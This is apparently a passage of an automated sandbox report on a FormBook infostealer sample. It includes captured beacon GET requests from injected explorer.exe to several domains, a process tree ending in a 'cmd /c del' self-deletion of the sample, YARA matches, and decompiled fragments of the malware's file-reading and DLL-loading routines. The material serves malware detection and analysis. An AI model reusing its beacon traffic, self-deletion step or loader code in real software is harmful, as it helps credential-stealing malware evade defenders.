Jan 13, 2021 20:49:09.570305109 CET	5442	IN	Data Raw: 73 3f 76 65 72 3d 35 2e 35 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 73 68 6f 70 2d 65 6c 69 74 65 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 73 74 79 6c Data Ascii: s?ver=5.5.3' type='text/css' media='all' /><style id='shop-elite-woocommerce-style-inline-css' type='text/css'>@font-face {font-family: "star";src: url("http://www.puzzelhome.com/wp-content/plugins/woocommerce/assets/fonts/star.eot
Jan 13, 2021 20:49:09.570384026 CET	5443	IN	Data Raw: 73 3a 2f 2f 73 74 61 74 73 2e 77 70 2e 63 6f 6d 2f 73 2d 32 30 32 31 30 32 2e 6a 73 27 20 69 64 3d 27 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 61 6e 61 6c 79 74 69 63 73 2d 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 68 Data Ascii: s://stats.wp.com/s-202102.js' id='woocommerce-analytics-js'></script><link rel="https://api.w.org/" href="http://www.puzzelhome.com/index.php/wp-json/" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.puzzelhome.c
Jan 13, 2021 20:49:09.570430994 CET	5444	IN	Data Raw: 2d 68 69 64 64 65 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 65 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 0d 0a 3c 64 69 76 20 69 64 3d 22 70 61 67 65 22 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e Data Ascii: -hidden"> <div class="preloader"></div> <div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content">Skip to content</a> <header id="saga-header" class="site-header"> <di

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49747	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:49:33.632935047 CET	5464	OUT	GET /8rg4/?Jt7=XPy4nFjH&GXITC=A4ItsHP+WlrLG/knzE1FqdRUH2iuHEJ7BxsWyFaOnTa5UmbK6eGivqtSi2ljMDHkmrx5 HTTP/1.1 Host: www.bodyfuelrtd.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 20:49:33.772039890 CET	5465	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Jan 2021 19:49:33 GMT Content-Type: text/html Content-Length: 275 ETag: "5ffc838f-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49748	184.168.131.241	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:49:47.313764095 CET	5467	OUT	GET /8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ HTTP/1.1 Host: www.100feetpics.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 20:49:47.551704884 CET	5467	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.16.1 Date: Wed, 13 Jan 2021 19:49:47 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: https://100-feet-pics.mykreezalid.com/8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: YvGnm93rap.exe PID: 2396 Parent PID: 5620

General

Start time:	20:47:25
Start date:	13/01/2021
Path:	C:\Users\user\Desktop\YvGnm93rap.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\YvGnm93rap.exe'
Imagebase:	0xb30000
File size:	654336 bytes
MD5 hash:	16E1A5D26C0698AC48D63661264E0BA1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: YvGnm93rap.exe PID: 6196 Parent PID: 2396

General

Start time:	20:47:29
Start date:	13/01/2021
Path:	C:\Users\user\Desktop\YvGnm93rap.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x460000
File size:	654336 bytes
MD5 hash:	16E1A5D26C0698AC48D63661264E0BA1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 6196

General

Start time:	20:47:31
Start date:	13/01/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: msiexec.exe PID: 6460 Parent PID: 3388

General

Start time:	20:47:44
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\msiexec.exe
Imagebase:	0x2a0000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6564 Parent PID: 6460

General

Start time:	20:47:49
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\YvGnm93rap.exe'
Imagebase:	0xd60000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6572 Parent PID: 6564

General

Start time:	20:47:49
Start date:	13/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: YvGnm93rap.exe PID: 2396 Parent PID: 5620 YvGnm93rap.exeCOMMON

Executed Functions

Function 0133BFC8, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0133C028
GetCurrentThread.KERNEL32 ref: 0133C065
GetCurrentProcess.KERNEL32 ref: 0133C0A2
GetCurrentThreadId.KERNEL32 ref: 0133C0FB

Memory Dump Source

Source File: 00000000.00000002.227153733.0000000001330000.00000040.00000001.sdmp, Offset: 01330000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 2bbf5d23a7ff9e2be009f6c2b7d02d7d82052ef0b39b22718a600b37bc07e3e7
Instruction ID: 696ac6f991fb98cbe6d32e812e8f416b075493370544b6e2fff1aa7ba40c7fcc
Opcode Fuzzy Hash: 2bbf5d23a7ff9e2be009f6c2b7d02d7d82052ef0b39b22718a600b37bc07e3e7
Instruction Fuzzy Hash: 355146B49016498FDB14CFA9C6487DEBBF0EF89318F20845AE419B7354DB39A848CF65

Uniqueness

Uniqueness Score: -1.00%

Function 01333E18, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01335421

Memory Dump Source

Source File: 00000000.00000002.227153733.0000000001330000.00000040.00000001.sdmp, Offset: 01330000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b9d61154c44c929fcab2383d3bf94c975328c92d1822f4f4193752764cf2104e
Instruction ID: 19bdb029d46d0dea40fe6a56ab8f47f2e33db358a73b7147b0e46c9f3d932471
Opcode Fuzzy Hash: b9d61154c44c929fcab2383d3bf94c975328c92d1822f4f4193752764cf2104e
Instruction Fuzzy Hash: 0941D070D0462DCBDB24DFA9C984B8DBBB5BF88308F248069D509BB251DB756949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0133536D, Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01335421

Memory Dump Source

Source File: 00000000.00000002.227153733.0000000001330000.00000040.00000001.sdmp, Offset: 01330000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 561e9301f4bcb6d287f6ebaeccc0f49409d67b3ec071adcdcfd55d5444628eb5
Instruction ID: 97aa0e06ca75cbddfa1b0ae11af76737c274229b84757cd2a5f35e8b81d30e28
Opcode Fuzzy Hash: 561e9301f4bcb6d287f6ebaeccc0f49409d67b3ec071adcdcfd55d5444628eb5
Instruction Fuzzy Hash: 9D41D270D0462DCEDB24CFA9C984BDDBBB1BF88308F248059D509BB251DB756949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0133C1F0, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0133C277

Memory Dump Source

Source File: 00000000.00000002.227153733.0000000001330000.00000040.00000001.sdmp, Offset: 01330000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b8d22cced193ad56590ea2562af6f51df3d37494422f0de0e4823f6d21edc756
Instruction ID: ae7d419bff120713bd73d5301cb91993f7da6011f7b385446b76d725c0a582ff
Opcode Fuzzy Hash: b8d22cced193ad56590ea2562af6f51df3d37494422f0de0e4823f6d21edc756
Instruction Fuzzy Hash: 0021C4B5900209DFDB10CFAAD984ADEBBF4FB48324F14841AE914B3310D778A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01339230, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01339F91,00000800,00000000,00000000), ref: 0133A1A2

Memory Dump Source

Source File: 00000000.00000002.227153733.0000000001330000.00000040.00000001.sdmp, Offset: 01330000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 24cae7d35f3ce3d5327813e4529050911ba52aac009422eb97a5ebfe2ec2ec74
Instruction ID: d1c776d00063fa32480402c3812a7d246d0a6858b5fecfff4d9c298b72db5bd7
Opcode Fuzzy Hash: 24cae7d35f3ce3d5327813e4529050911ba52aac009422eb97a5ebfe2ec2ec74
Instruction Fuzzy Hash: B41114B6D042089FDB10CF9AD944ADEFBF4EB98364F10842EE555A7200C778A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0133A130, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01339F91,00000800,00000000,00000000), ref: 0133A1A2

Memory Dump Source

Source File: 00000000.00000002.227153733.0000000001330000.00000040.00000001.sdmp, Offset: 01330000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9a6497287311fca6354f2f7f7def8f048aa4173c8dd5db4f780ee60e9742b1c2
Instruction ID: 356a2c9e29fc301e41b9114226eeee90124405a58b3d2f5b0973604a83e77d18
Opcode Fuzzy Hash: 9a6497287311fca6354f2f7f7def8f048aa4173c8dd5db4f780ee60e9742b1c2
Instruction Fuzzy Hash: 2C1144B6C002088FDB10CFAAD984ADEFBF4AB88354F10842ED815A7300C778A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01339EB0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01339F16

Memory Dump Source

Source File: 00000000.00000002.227153733.0000000001330000.00000040.00000001.sdmp, Offset: 01330000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f942c74137af46212f1db9d10f1acd5ef003f495db486470cc8b23e673210235
Instruction ID: 7487dcae5c06452ae9ca84718befa542907e9cc4043924cb0e1399e9f4e5b0c5
Opcode Fuzzy Hash: f942c74137af46212f1db9d10f1acd5ef003f495db486470cc8b23e673210235
Instruction Fuzzy Hash: BB110FB6C006498FDB10CF9AC544BDEFBF4AB88328F10841AD429B7600C779A549CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0117D400, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.227092526.000000000117D000.00000040.00000001.sdmp, Offset: 0117D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b69615a2a2513c7c9c4ed703966bacbc1962926f22d3929bafda0501be4ede6c
Instruction ID: 2faf48a566785039c6dcbb06b2809facf22cdf7e393d120ca6d5d73deba34618
Opcode Fuzzy Hash: b69615a2a2513c7c9c4ed703966bacbc1962926f22d3929bafda0501be4ede6c
Instruction Fuzzy Hash: 3A21F471504248DFDF19DF94E9C0B56BB75FF84324F24C5A9D9060A706C336E856CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0117D4EC, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.227092526.000000000117D000.00000040.00000001.sdmp, Offset: 0117D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71237c6dde23128e9da2e5af26ab12654e2795c212bcb67f24196e3139052cc3
Instruction ID: 1e7e065151a7f47d313a307abd4bcef131979150151e5a4032a392e3d754f8b9
Opcode Fuzzy Hash: 71237c6dde23128e9da2e5af26ab12654e2795c212bcb67f24196e3139052cc3
Instruction Fuzzy Hash: D721F4B1504248DFDF09DF94E9C0B26BF75FF88328F2485A9D9050B306C336D855CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0129D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.227110152.000000000129D000.00000040.00000001.sdmp, Offset: 0129D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12fe3bf478a8b9e414a726bc0e254fb4a368ac67353d415f20d40b25db190b9a
Instruction ID: f588ae14193b71428983fbb293a8a82149e32a39b6e9b6f77099b205c03b589b
Opcode Fuzzy Hash: 12fe3bf478a8b9e414a726bc0e254fb4a368ac67353d415f20d40b25db190b9a
Instruction Fuzzy Hash: AB214271514208DFCF10CFA8D9C0B26BBA5FB84354F20C9ADD90A4B342C73BD806DA62

Uniqueness

Uniqueness Score: -1.00%

Function 0117D3FB, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.227092526.000000000117D000.00000040.00000001.sdmp, Offset: 0117D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e9cd8aacd33506535d2ad590ff13daa1a79972ad8fbb3afe5d1e395e3249391
Instruction ID: b074d427f12b45b0a22d6fba704b42e146663551ccd57c049696c2997c3aafb3
Opcode Fuzzy Hash: 9e9cd8aacd33506535d2ad590ff13daa1a79972ad8fbb3afe5d1e395e3249391
Instruction Fuzzy Hash: B2119D76404284DFCF16CF54E5C4B56BF71FB84320F2886A9D9090A656C33AE45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0117D4E7, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.227092526.000000000117D000.00000040.00000001.sdmp, Offset: 0117D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e9cd8aacd33506535d2ad590ff13daa1a79972ad8fbb3afe5d1e395e3249391
Instruction ID: 1ea80545ea00f1a4ec0d17e9e948ef5e3632d72244f1565e820d142677bee1bb
Opcode Fuzzy Hash: 9e9cd8aacd33506535d2ad590ff13daa1a79972ad8fbb3afe5d1e395e3249391
Instruction Fuzzy Hash: 45119D76404284CFCF16CF54D5C4B16BF72FB88324F2886A9D8090A756C336D45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0129D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.227110152.000000000129D000.00000040.00000001.sdmp, Offset: 0129D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bf207d9f1e19865214e696f6889b3b8552dca42710745fc8c607f25a3992a05
Instruction ID: 489ccca2fee131473073494331ebcf6dfd5b66bdbc529a91178b7c6bf264b279
Opcode Fuzzy Hash: 6bf207d9f1e19865214e696f6889b3b8552dca42710745fc8c607f25a3992a05
Instruction Fuzzy Hash: B211BB75504284CFDB12CF68D5C4B15BBA1FB84324F28C6AAD9094B656C33AD44ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0117D745, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.227092526.000000000117D000.00000040.00000001.sdmp, Offset: 0117D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 156a6fdeecc5b656d80db97d6c8cf6152e3fcfe53ef2b2b39bb5bc4964873b6a
Instruction ID: 5ce36a70700d8b8f8a26823b6a2367c425bcc039d18ab979653e2de582bec086
Opcode Fuzzy Hash: 156a6fdeecc5b656d80db97d6c8cf6152e3fcfe53ef2b2b39bb5bc4964873b6a
Instruction Fuzzy Hash: 7201FC71008B849AEB144EA5DE847A6FFACDF4123CF148559EA044B342D7789844C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 0117D744, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.227092526.000000000117D000.00000040.00000001.sdmp, Offset: 0117D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c11a0e5dafa402951cd91481991acf47132f73a97f011660793c4c09b1e9a40
Instruction ID: 8f78f381ba3f1d89c06fa829d2a5aaf79ec8d407464101711295a30e94855af7
Opcode Fuzzy Hash: 8c11a0e5dafa402951cd91481991acf47132f73a97f011660793c4c09b1e9a40
Instruction Fuzzy Hash: 6BF0C8714046849AEB148E59DD84BA2FFA8DF81238F18C45AED044B346C7785844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B38D5D, Relevance: 1.8, Instructions: 1769COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.226743304.0000000000B32000.00000002.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.226737822.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.226817296.0000000000BC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.226821308.0000000000BC4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.226831421.0000000000BD2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b12076561e9122e2b3ff67c2e8b3553d58c7c44b927809343235c654538176d
Instruction ID: 9b384a0244a8e125c66808acfaf30a4a6551e06ac77c9c7080236742d311c9a6
Opcode Fuzzy Hash: 9b12076561e9122e2b3ff67c2e8b3553d58c7c44b927809343235c654538176d
Instruction Fuzzy Hash: 7DE2DD6190E7C18FDB135BB86DB12917FB1AE63218B2E48C7C4C1CF0B3D149596AD72A

Uniqueness

Uniqueness Score: -1.00%

Function 0133EEB0, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.227153733.0000000001330000.00000040.00000001.sdmp, Offset: 01330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a055bf45a2b56d123a06c7f476ad2482d2fe73d5312aa21d61e0875b974c5ba
Instruction ID: 5a34ee50e791337b5067cd2dc3ea139faca8e0d35b054fa378f2d1b1e06da6d9
Opcode Fuzzy Hash: 6a055bf45a2b56d123a06c7f476ad2482d2fe73d5312aa21d61e0875b974c5ba
Instruction Fuzzy Hash: 5512C6F18117468BF732CF65E8981893BB9F745B28F914208D2616FAD9D7B8314ACF84

Uniqueness

Uniqueness Score: -1.00%

Function 0133CAE4, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.227153733.0000000001330000.00000040.00000001.sdmp, Offset: 01330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 593598a06adf289dd85159060c1c84d6c8998e72541b43c6894b6696c55623f1
Instruction ID: 10d99fdb36fc1972a6eac47aafc2a85f49ad880a0b711cc20ecdd52d6f3cb65f
Opcode Fuzzy Hash: 593598a06adf289dd85159060c1c84d6c8998e72541b43c6894b6696c55623f1
Instruction Fuzzy Hash: EEA17D32E0021A8FCF09DFA9C8445DEBBB6FFC5304B15857AE905BB265DB71A945CB40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: YvGnm93rap.exe PID: 6196 Parent PID: 2396 YvGnm93rap.exeCOMMON

Executed Functions

Function 0041826B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 004182AD, 004182B4
R=A, xrefs: 00418292, 004182A0

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: a566198a760e1fa790e9a5891f718fec73f0eaf222ef57f5723995e62319b5cd
Instruction ID: 6c86b9f614afb159e78a90aa519368a9f519a3f288ef952b1961a507ae2d8144
Opcode Fuzzy Hash: a566198a760e1fa790e9a5891f718fec73f0eaf222ef57f5723995e62319b5cd
Instruction Fuzzy Hash: 6911C3B2200208AFCB04DF99DC80DEB77ADAF9C354B15864DFE0D97241CA34E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00418273
0x0041827f
0x00418287
0x00418292
0x004182ad
0x004182b5
0x004182b9

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 004182AD, 004182B4
R=A, xrefs: 00418292, 004182A0

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b3c
0x00409b3f
0x00409b44
0x00409b49
0x00409b53
0x00409b58
0x00409b5b
0x00409b5d
0x00409b65
0x00409b6a
0x00409b6a
0x00409b71
0x00409b79
0x00409b7c
0x00409b7e
0x00409b92
0x00000000
0x00409b94
0x00409b9a
0x00409b4e
0x00409b4e
0x00409b4e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
